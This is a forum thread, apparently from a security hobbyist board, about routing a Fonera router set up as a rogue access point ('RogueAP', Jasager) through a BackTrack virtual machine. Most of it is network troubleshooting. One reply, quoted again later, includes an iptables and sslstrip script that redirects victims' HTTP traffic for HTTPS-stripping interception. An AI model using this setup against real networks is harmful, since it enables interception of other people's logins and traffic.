VMWare Backtrack and Fonera 2201 Options

[rosbif]

Hi there,

I've spent the best part of the day searching through the site and googling for help, before deciding to bother you all with this. Excuse the newbie questions.

I'm running backtrack in a vmware and want to set up the fonera to run through this. I got it set up through windows with ICS fine, but am having issues with the backtrack set up. Primarily because of the networking side of things through the VMWare.

The route I'm expecting is

Fonera -> VMWare Backtrack -> Windows box -> Internet (I think this is right)

Here are some bits of network info.

1. Home network 192.168.0.0/24
2. Backtrack network through VMWware 192.168.124.0/24

3. Fonera IP address : 192.168.1.1
4. Internet gateway : 192.168.0.100
5. VMWare eth0 : 192.168.124.128
6. VMWare adapter (Windows host side) : 192.168.124.10
7. IP address of Windows box 192.168.0.102

VMware ifconfig:

eth0 Link encap:Ethernet HWaddr 00:0c:29:f7:56:e2
inet addr:192.168.124.128 Bcast:192.168.124.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fef7:56e2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:39225 errors:0 dropped:0 overruns:0 frame:0
TX packets:34972 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24833456 (24.8 MB) TX bytes:3821384 (3.8 MB)
Interrupt:18 Base address:0x1080

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:392 errors:0 dropped:0 overruns:0 frame:0
TX packets:392 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:19600 (19.6 KB) TX bytes:19600 (19.6 KB)

Fonera ifconfig:

ath0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F9
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:748 errors:0 dropped:44 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 TX bytes:295263 (288.3 KiB)

br-lan Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:258665 (252.6 KiB) TX bytes:267270 (261.0 KiB)

eth0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
TX packets:3402 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:302185 (295.1 KiB) TX bytes:569405 (556.0 KiB)
Interrupt:255 Base address:0x1000

eth0.0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2720 errors:0 dropped:0 overruns:0 frame:0
TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:258665 (252.6 KiB) TX bytes:267270 (261.0 KiB)

eth0.1 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:728 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 TX bytes:292656 (285.7 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:12 errors:0 dropped:0 overruns:0 frame:0
TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:720 (720.0 TX bytes:720 (720.0

wifi0 Link encap:UNSPEC HWaddr 00-18-84-A5-85-F9-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22471 errors:0 dropped:0 overruns:0 frame:689
TX packets:2836 errors:485 dropped:0 overruns:0 carrier:0

root@RogueAP:~# brctl show
bridge name bridge id STP enabled interfaces
br-lan 8000.001884a585f8 no ath0
eth0.0

fonera /etc/config/network:

config 'interface' 'loopback'
option 'ifname' 'lo'
option 'proto' 'static'
option 'ipaddr' '127.0.0.1'
option 'netmask' '255.0.0.0'

config 'interface' 'lan'
option 'type' 'bridge'
option 'ipaddr' '192.168.1.1'
option 'netmask' '255.255.255.0'
option 'ifname' 'eth0.0'
option 'dns' '8.8.8.8 8.8.4.4'
option 'proto' 'static'
option 'macaddr' ''
option 'ip6addr' ''
option 'ip6gw' ''
option 'gateway' ''

config 'interface' 'wan'
option 'ifname' 'eth0.1'
option 'macaddr' ''
option 'ip6addr' ''
option 'netmask' ''
option 'gateway' '192.168.0.100'
option 'ip6gw' ''
option 'dns' ''
option 'proto' 'dhcp'
option 'ipaddr' ''

config 'interface' 'wifi'
option 'ifname' 'ath0'
option 'proto' 'dhcp'
option 'macaddr' ''
option 'ipaddr' ''
option 'ip6addr' ''
option 'netmask' ''
option 'gateway' ''
option 'ip6gw' ''
option 'dns' ''

fonera /etc/config/dhcp

config 'dnsmasq'
option 'domainneeded' '1'
option 'boguspriv' '1'
option 'filterwin2k' '0'
option 'localise_queries' '1'
option 'local' '/lan/'
option 'domain' 'lan'
option 'expandhosts' '1'
option 'nonegcache' '0'
option 'authoritative' '1'
option 'readethers' '1'
option 'leasefile' '/tmp/dhcp.leases'
option 'resolvfile' '/tmp/resolv.conf.auto'

config 'dhcp' 'lan'
option 'interface' 'lan'
option 'start' '100'
option 'limit' '150'
option 'leasetime' '12h'
list 'dhcp_option' '3,192.168.0.100'

config 'dhcp' 'wan'
option 'interface' 'wan'
option 'ignore' '1'

config 'host'
option 'name' 'BackTrackBox'
option 'ip' '192.168.0.102'

config 'dhcp' 'cfg0875fa'
option 'start' '2'
option 'limit' '250'
option 'leasetime' '60m'
option 'ignore' '0'
option 'interface' 'wifi'

Now I can access the internet through the VMWare, no problems, but through the fonera I can't even ping IP addresses.

root@RogueAP:/etc/config# ping 192.168.0.100
PING 192.168.0.100 (192.168.0.100): 56 data bytes
ping: sendto: Network is unreachable
root@RogueAP:/etc/config# ping 192.168.124.128
PING 192.168.124.128 (192.168.124.128): 56 data bytes
ping: sendto: Network is unreachable

I'm sure I've screwed something up. Can anyone give me any clues/help please?

TIA,

Neil

[Psychosis]

Firstly, you dont needs ICS enabled on the windows box.

You also have what appears to be a complete salad of IP addresses.

Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network.

The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used.

Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\.

So on your VM, you should have 2 virtual NICs. bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network.

Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to setup DNS.

Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE. I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip:

CODE

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0
sudo dhclient eth0
python sslstrip.py -l 64123 -f lock.ico

(eth1 is Fon network, eth0 is home network.)

If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done.

[rosbif]

Firstly, you dont needs ICS enabled on the windows box.

Y'know, I try to be clear in my posts so I can get my message across and I still screw it up. I meant to say that I'd tested my setup using Windows ICS, just to see if I could get it all working. Now my aim is to do the same in the VMWare session.

You also have what appears to be a complete salad of IP addresses.

I know. Having the VMWare session just threw me completely.

Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network.

The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used.

Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\.

So on your VM, you should have 2 virtual NICs. bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network.

Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to setup DNS.

Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE. I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip:

CODE

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0
sudo dhclient eth0
python sslstrip.py -l 64123 -f lock.ico

(eth1 is Fon network, eth0 is home network.)

If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done.

Lovely stuff, thanks very much for your input on this. I'll report back later on.

Neil

[rosbif]

Lovely stuff, thanks very much for your input on this. I'll report back later on.

Neil

Dunno if it's bad form to reply to your own posts, but I played around with the settings as described above, and aside from a bit of VMWare network tweaking, it worked fine. Thanks very much for your help.

N

[Psychosis]

No problem.